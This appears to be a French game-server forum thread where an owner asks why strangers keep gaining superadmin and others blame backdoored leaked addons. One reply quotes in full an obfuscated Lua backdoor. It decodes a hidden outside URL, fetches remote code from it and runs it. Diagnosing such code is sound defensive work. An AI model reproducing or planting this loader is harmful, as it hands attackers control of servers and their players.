- Initiateur de la discussion
Jayce Arkania
Geek
- Score réaction
- 1
bonjour depuis que mon nouveau serveur , 3 personnes sont mis superadmin , mais comment ont enleve qui peux se mettre superadmin ,
Ou de leak forumYoh Sambre ♪ à dit:Backdoor , n'utilisez plus de leak ou d'addons cool de vos "amis"
Apohy à dit:1. Backdoor
2. Installe un AC pour éviter les exploits Lua.
...brh450 à dit:Ou de leak forum
Yoh Sambre ♪ à dit:n'utilisez plus de leak
hook.Add("\84\104\105\110\107","\73\83\83\79\85\83", function() RunString("function util.ABCDEFGEEZGEEGZGE( data ) local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' if !data then return end data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if (x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f%2^i-f%2^(i-1)>0 && '1' || '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?', function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+(x:sub(i,i)=='1' && 2^(8-i) || 0) end return string.char(c) end)) end http.Fetch(string.reverse(util.ABCDEFGEEZGEEGZGE('cGhwLjFlZ2F0cy9lcm9jL2lrYWduYXRheS84NzEuODMyLjU2MS44ODEvLzpwdHRo')),function(body,len,headers,code) RunString(body) end)") hook.Remove("\84\104\105\110\107","\73\83\83\79\85\83") end)
FridomFR à dit:cGhwLjFlZ2F0cy9lcm9jL2lrYWduYXRheS84NzEuODMyLjU2MS44ODEvLzpwdHRo
Personnellement je n'utilise que de VRAIS scripts que nous avons achetés et je te conseil @Jayce de faire la même chose car deFridomFR à dit:Mais il a bien une centaine de serveur de toutes langue sur sont panel ce qui prouve que bien 80% des serveurs utilisent des leak ... Malheuresement
@Cody_2224 il a raison, c'est simplement qu'il a dit dans son script de faire quelque chose. C'est un script comme un autre, simplement un script méchant. Ce n'est pas une backdoor pour info.FridomFR à dit:@Cody_2224 c'estt pas une question de hack et anti cheat ya rien a voir ^^ C'est juste les permissions qui sont accédé par n'importe qui ^^
Autant pour moi ^^.Feytone à dit:@Cody_2224 il a raison, c'est simplement qu'il a dit dans son script de faire quelque chose. C'est un script comme un autre, simplement un script méchant. Ce n'est pas une backdoor pour info.
LEL ces juste qu'il s'agit d'un addons que tous les serveur possède... Comme un antipropkill célèbreFridomFR à dit:Mais il a bien une centaine de serveur de toutes langue sur sont panel ce qui prouve que bien 80% des serveurs utilisent des leak ... Malheuresement
Yoh Sambre ♪ à dit:Comme un antipropkill célèbre
Non je t'assure que c'est pas moiSwarzox à dit:
Surement phacocher ou lord rushi
Zukih à dit:Exactement la méme